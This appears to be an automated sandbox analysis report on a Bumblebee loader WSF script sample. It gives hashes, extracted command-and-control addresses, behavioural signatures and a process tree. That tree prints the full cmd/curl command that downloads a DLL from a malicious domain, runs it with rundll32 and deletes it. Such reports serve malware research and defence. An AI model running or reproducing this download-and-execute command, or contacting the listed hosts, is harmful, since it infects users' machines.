Analysis
-
max time kernel
144s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
20-04-2023 19:33
Static task
static1
Behavioral task
behavioral1
Sample
doc_88BFNS_57.wsf
Resource
win7-20230220-en
General
-
Target
doc_88BFNS_57.wsf
-
Size
192KB
-
MD5
d6d0f8cf0b9383802fd4868c2082017d
-
SHA1
16b03efbf2aa547ca308ae50d8673012844c52b9
-
SHA256
f6ff607f55b6c53b700e3c1a8a4230c01641111bfc09645ba54c75ca2b1587cd
-
SHA512
0e331aeef702394d3b04939f0755bdbbc79ac24e23cbf54fad51645da045b598ee4077ba629af1a5f1e833b062f92acd033fd718c41dedb27b5041199f449efb
-
SSDEEP
6144:rPYy39mm2+oVmcySJnfzKe1ZFmqRzgim/Ytix:TYy3Cdtn1Hw
Malware Config
Extracted
bumblebee
mc1904
146.70.155.82:443
149.3.170.179:443
103.175.16.150:443
Signatures
-
Blocklisted process makes network request 8 IoCs
flow pid Process 3 1948 WScript.exe 17 3724 rundll32.exe 29 3724 rundll32.exe 43 3724 rundll32.exe 44 3724 rundll32.exe 50 3724 rundll32.exe 53 3724 rundll32.exe 54 3724 rundll32.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation WScript.exe -
Loads dropped DLL 1 IoCs
pid Process 3724 rundll32.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3724 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 3 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1948 wrote to memory of 3244 1948 WScript.exe 87 PID 1948 wrote to memory of 3244 1948 WScript.exe 87 PID 3244 wrote to memory of 544 3244 cmd.exe 89 PID 3244 wrote to memory of 544 3244 cmd.exe 89 PID 3244 wrote to memory of 3724 3244 cmd.exe 90 PID 3244 wrote to memory of 3724 3244 cmd.exe 90
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\doc_88BFNS_57.wsf"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c curl -s --ssl-no-revoke --fail https://biznessfarm.buzz/mmm2/DiqLyFvy2N0LYrttmJnMIAadyzDl_bYhxQ~~/QdaQp4v9soc3yoFDOCHH_cpZg_ECJjHlNg~~/ --output nmohzblo.obh && if exist nmohzblo.obh rundll32 nmohzblo.obh,bYXjdERymsFY && del nmohzblo.obh2⤵
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\system32\curl.execurl -s --ssl-no-revoke --fail https://biznessfarm.buzz/mmm2/DiqLyFvy2N0LYrttmJnMIAadyzDl_bYhxQ~~/QdaQp4v9soc3yoFDOCHH_cpZg_ECJjHlNg~~/ --output nmohzblo.obh3⤵PID:544
-
-
C:\Windows\system32\rundll32.exerundll32 nmohzblo.obh,bYXjdERymsFY3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
PID:3724
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD5adcfd6939319c09ad8cbef72a81944a5
SHA1154c1f4bc247d79789ec7eaf0feb92ea0d932445
SHA256d763681286d9d514420c27210746edd5bb9b563b626c0cdb2c61239292b86535
SHA5124f4fb6e9d2c833d4335dc816fbac2b5d25d3b95fdd1dced1b795c5564d367dca533eb743842fcf31ae74563cba451ae55b226e44f05b4745613b8e6e50e010ce
-
Filesize
1.4MB
MD5adcfd6939319c09ad8cbef72a81944a5
SHA1154c1f4bc247d79789ec7eaf0feb92ea0d932445
SHA256d763681286d9d514420c27210746edd5bb9b563b626c0cdb2c61239292b86535
SHA5124f4fb6e9d2c833d4335dc816fbac2b5d25d3b95fdd1dced1b795c5564d367dca533eb743842fcf31ae74563cba451ae55b226e44f05b4745613b8e6e50e010ce